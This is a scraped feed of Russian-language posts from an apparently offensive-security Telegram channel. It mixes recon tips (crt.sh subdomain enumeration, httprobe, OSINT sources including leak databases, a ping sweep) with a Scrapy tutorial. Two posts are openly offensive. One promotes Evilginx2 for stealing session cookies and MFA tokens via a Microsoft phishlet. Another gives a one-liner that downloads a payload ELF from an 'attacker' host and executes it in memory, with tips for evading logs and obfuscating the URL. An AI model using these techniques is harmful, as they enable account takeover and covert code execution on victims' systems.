Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.
Чем полезен:
— Обход классических 2FA/SMS/MFA
— Реалистичные фишинговые страницы (копируются вживую)
— Поддержка кастомных фишинговых шаблонов
— Логи сессий с захваченными cookies и токенами
Пример запуска:
evilginx -p ./phishlets/microsoft.yaml
После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7👏2
Не базовые ls и cd, а готовые мини-скрипты: перенос директорий, умное переименование файлов, калькулятор, расширенный пинг и даже предсказания с cowsay.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5😁5🔥1
Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:
curl http://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'
Как работает:
— curl тянет бинарь по HTTP
— /dev/fd/0 — спецфайл, указывающий на поток stdin
— chmod +x делает поток исполняемым
— /dev/fd/0 сразу запускается как исполняемый ELF
Полезно для:
— Заменить curl на wget -qO-, socat, nc, httpie
— Альтернатива: /proc/self/fd/0
— Можно обфусцировать URL, использовать TLS и подмену юзер-агента
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍3
🔧 Автоматизация сбора данных с веб-сайтов через Scrapy
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
➖ Сбора данных
➖ Поиска уязвимостей и метаданных
➖ OSINT и аналитики
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
2. Создайте новый проект с помощью команды:
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
4. Пример паука:
5. После настройки паука вы можете запустить его с помощью команды:
Советы по использованию:
— Настройте
— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
🐸 Библиотека хакера
#буст
Scrapy — Python-фреймворк для веб-скрейпинга. Идеально подходит для:
Как работает:
1. Для начала нужно установить Scrapy. Это можно сделать через pip:
pip install scrapy
2. Создайте новый проект с помощью команды:
scrapy startproject myproject
3. Создайте новый файл паука в каталоге spiders/ вашего проекта:
scrapy genspider example_spider example.com
4. Пример паука:
import scrapy
class ExampleSpider(scrapy.Spider):
name = "example_spider"
start_urls = ['https://www.example.com']
def parse(self, response):
yield {
'title': response.xpath('//title/text()').get(),
'url': response.url,
}
5. После настройки паука вы можете запустить его с помощью команды:
scrapy crawl example_spider -o output.json
Советы по использованию:
— Настройте
DOWNLOAD_DELAY— Используйте обработку ошибок
— Применяйте разные User-Agent / Proxy
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👏1👾1
На рынке дефицит SOC-аналитиков, DevSecOps, AppSec-инженеров и менеджеров.
Эксперты рассказали:
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👏3👍1👾1
Хорошая разведка строится не на «хаках», а на внимательности к деталям: домен, фото в соцсетях, забытый тестовый сервер.
— История DNS (SecurityTrails, DNSdumpster)
— SSL-сертификаты (
crt.sh, censys.io)— Ассеты по ASN/IP-диапазонам
— Корпоративные e-mail (
Hunter.io, Clearbit)— GitHub/GitLab — коммиты с конфигами и токенами
— Поведенческие паттерны в соцсетях
— Dorking по
site:company.com filetype:pdf/doc/xls— EXIF/метаданные (авторы, софт, пути)
— Проверка корпоративных доменов в базах утечек (DeHashed, LeakCheck)
— Даркнет-форумы и Telegram-каналы (ключевые слова, почты, домены)
— Wappalyzer/BuiltWith для CMS и плагинов
— Проверка версий сервисов через Shodan/Censys
⚡️ Результат: карта инфраструктуры + список потенциальных точек входа без единого «актива» внутри сети.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍3
Когда нужно быстро проверить сотни доменов на живые HTTP(S)-эндпоинты — без лишнего шума.
Что умеет:
amass, subfinder, assetfinderКак запустить:
1. Установка
go install github.com/tomnomnom/httprobe@latest
2. Проверка списка
cat domains.txt | httprobe > alive.txt
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
При тестировании часто нужен список поддоменов цели. Один из самых простых способов — использовать публичный сервис, который собирает данные из сертификатов.
Откройте crt.sh и вбейте домен цели, например:
%.example.com
Символ
% работает как wildcard — покажет все поддомены.Результаты выдаются в таблице. Можно скопировать руками или выгрузить в CSV/JSON, добавив параметр:
https://crt.sh/?q=%.example.com&output=json
Сервис часто показывает дубликаты или старые записи. Очистить список можно простым one-liner:
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u
Теперь список можно прогнать через
httprobe, httpx или любой другой тул, чтобы проверить, какие живые.crt.sh иногда показывает внутренние dev/test-домены, которые забыли закрыть. Часто именно они оказываются уязвимыми.#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
Около 70 заданий, которые помогут освоить основы CLI. Формат игровой: проходить интересно, а заодно и полезно для прокачки навыков.
Отличный вариант для самообучения и набора опыта
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
Иногда нужно быстро понять, какие устройства живые в локалке. Для этого подойдёт простая однострочная команда:
for i in {1..254}; do ping -c1 192.168.1.$i | grep "64 bytes"; done
for i in {1..254} — перебираем все IP в подсети 192.168.1.0/24ping -c1 — отправляем по одному пакету на каждый адресgrep "64 bytes" — фильтруем успешные ответыВ результате получаем список активных хостов в сети
⚡ Лайфхаки:
— Можно заменить
192.168.1 на свою подсеть— Чтобы ускорить процесс, используй
fping или nmap -sn 192.168.1.0/24#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6👾3